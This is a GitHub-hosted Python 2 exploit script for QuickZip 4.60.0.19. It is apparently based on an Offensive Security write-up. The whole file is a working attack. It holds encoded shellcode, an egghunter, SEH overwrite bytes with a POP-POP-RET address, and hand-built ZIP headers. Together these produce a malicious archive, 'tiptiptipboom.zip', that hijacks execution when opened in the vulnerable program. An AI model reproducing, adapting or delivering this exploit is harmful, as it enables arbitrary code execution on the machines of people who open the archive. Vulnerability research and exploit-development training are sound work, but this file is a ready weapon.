exploit-5/quickzip_seh_selfexe.py at master · exploit-inters/exploit-5 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
# Exploit Title: QuickZip 4.60.0.19 SEH Overwrite Exploit using POPPOPRET from self-executable (Tested on Windows XP SP3)
# Based on https://www.offensive-security.com/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/
# Date: 06/18/2018

import os, struct

shellcode = (
"\xba\x86\x09\x42\x5b\xda\xc8\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x4f\x31\x56\x14\x03\x56\x14\x83\xc6\x04\x64\xfc\xbe\xb3\xe1"
"\xff\x3e\x44\x91\x76\xdb\x75\x83\xed\xaf\x24\x13\x65\xfd\xc4"
"\xd8\x2b\x16\x5e\xac\xe3\x19\xd7\x1a\xd2\x14\xe8\xab\xda\xfb"
"\x2a\xaa\xa6\x01\x7f\x0c\x96\xc9\x72\x4d\xdf\x34\x7c\x1f\x88"
"\x33\x2f\x8f\xbd\x06\xec\xae\x11\x0d\x4c\xc8\x14\xd2\x39\x62"
"\x16\x03\x91\xf9\x50\xbb\x99\xa5\x40\xba\x4e\xb6\xbd\xf5\xfb"
"\x0c\x35\x04\x2a\x5d\xb6\x36\x12\x31\x89\xf6\x9f\x48\xcd\x31"
"\x40\x3f\x25\x42\xfd\x47\xfe\x38\xd9\xc2\xe3\x9b\xaa\x74\xc0"
"\x1a\x7e\xe2\x83\x11\xcb\x61\xcb\x35\xca\xa6\x67\x41\x47\x49"
"\xa8\xc3\x13\x6d\x6c\x8f\xc0\x0c\x35\x75\xa6\x31\x25\xd1\x17"
"\x97\x2d\xf0\x4c\xa1\x6f\x9d\xa1\x9f\x8f\x5d\xae\xa8\xfc\x6f"
"\x71\x02\x6b\xdc\xfa\x8c\x6c\x23\xd1\x68\xe2\xda\xda\x88\x2a"
"\x19\x8e\xd8\x44\x88\xaf\xb3\x94\x35\x7a\x13\xc5\x99\xd5\xd3"
"\xb5\x59\x86\xbb\xdf\x55\xf9\xdb\xdf\xbf\x8c\xdc\x48\x80\x27"
"\x3c\x0d\x68\x3a\xc0\x1f\x35\xb3\x26\x75\xd5\x95\xf1\xe2\x4c"
"\xbc\x89\x93\x91\x6a\x19\x37\x03\xf1\xd9\x3e\x38\xae\x8e\x17"
"\x8e\xa7\x5a\x8a\xa9\x11\x78\x57\x2f\x59\x38\x8c\x8c\x64\xc1"
"\x41\xa8\x42\xd1\x9f\x31\xcf\x85\x4f\x64\x99\x73\x36\xde\x6b"
"\x2d\xe0\x8d\x25\xb9\x75\xfe\xf5\xbf\x79\x2b\x80\x5f\xcb\x82"
"\xd5\x60\xe4\x42\xd2\x19\x18\xf3\x1d\xf0\x98\x03\x54\x58\x88"
"\x8b\x31\x09\x88\xd1\xc1\xe4\xcf\xef\x41\x0c\xb0\x0b\x59\x65"
"\xb5\x50\xdd\x96\xc7\xc9\x88\x98\x74\xe9\x98" )

egghunter = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FnaxJiodO2bPRqzs2chHMfNelS52zadzOmhRtvPDpf7NkJZNObUxjloRUxgkOxgAA"
stack_align = "\x5f\x5f\x5f\x5c"
zero_eax = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
magicjmp = stack_align + zero_eax + "\x2D\x40\x53\x55\x5F\x2D\x40\x53\x55\x5F\x2D\x42\x55\x56\x60\x50"
magicjmp += zero_eax + "\x2D\x39\x37\x33\x53\x2D\x39\x37\x33\x53\x2D\x39\x39\x33\x54\x50"
# POPPOPRET in QuickZip.exe 0x00407a33
filename = egghunter + "A" * (200 - len(egghunter)) + magicjmp + "A" * (294 - 200 - len(magicjmp)) + "\x73\xff\x41\x41" + "\x33\x7a\x40\x00" + "T00WT00W" + shellcode + "D" * (5000 - 294 - 4 - 4 - 8 - len(shellcode))

# =======================================================================================================

lfheader = "\x50\x4b\x03\x04" 		# local file header signature
lfheader += "\x14\x00"			# version needed to extract
lfheader += "\x00\x00"			# general purpose bit flag
lfheader += "\x00\x00"			# compression method
lfheader += "\xb7\xac"			# file last modtime
lfheader += "\xce\x34"			# file last moddate
lfheader += "\x00\x00\x00\x00"		# crc32
lfheader += "\x00\x00\x00\x00"		# compressed size
lfheader += "\x00\x00\x00\x00"		# uncompressed size
lfheader += struct.pack('<h', int(len(filename)))  # file name length
lfheader += "\x00\x00" 			# extra field length

cdfheader = "\x50\x4B\x01\x02"		# central directory file header signature
cdfheader += "\x14\x00"			# version made by
cdfheader += "\x14\x00"			# vesion need to extract
cdfheader += "\x00\x00"			# general purpose bit flag
cdfheader += "\x00\x00"			# compression method
cdfheader += "\xB7\xAC"			# file last modtime
cdfheader += "\xCE\x34"			# file last moddate
cdfheader += "\x00\x00\x00\x00"		# crc32
cdfheader += "\x00\x00\x00\x00"		# compressed size
cdfheader += "\x00\x00\x00\x00"		# uncompressed size
cdfheader += struct.pack('<h', int(len(filename)))  # file name length
cdfheader += "\x00\x00"			# extra field length
cdfheader += "\x00\x00"			# file comment length
cdfheader += "\x00\x00"			# disk number where file starts
cdfheader += "\x01\x00"			# internal file attributes
cdfheader += "\x24\x00\x00\x00"		# external file attributes
cdfheader += "\x00\x00\x00\x00"		# relatvie offset of local file header

eocd = "\x50\x4B\x05\x06"		# end of central directory signature
eocd += "\x00\x00"			# number of this disk
eocd += "\x00\x00"			# disk where central directory starts
eocd += "\x01\x00"			# number of central directory records on this disk
eocd += "\x01\x00"			# total number of central directory records
eocd += struct.pack('<L', int(len(cdfheader + filename)))		# size of central directory (bytes)
eocd += struct.pack('<L', int(len(lfheader + filename))) 	# offset of start of central directory, relative to start of archive
eocd += "\x00\x00"			# comment length

# =======================================================================================================

print "Size = " + str(len(filename))
print "lfheader_length = " + str(len(lfheader))
print "cdfheader_length = " + str(len(cdfheader))
print "eocd_length = " + str(len(eocd))

os.system("del tiptiptipboom.zip")

buf = lfheader + filename + cdfheader + filename + eocd

fh = open("tiptiptipboom.zip", "w")
fh.write(buf)
fh.close()

raw_input('Press Enter to exit')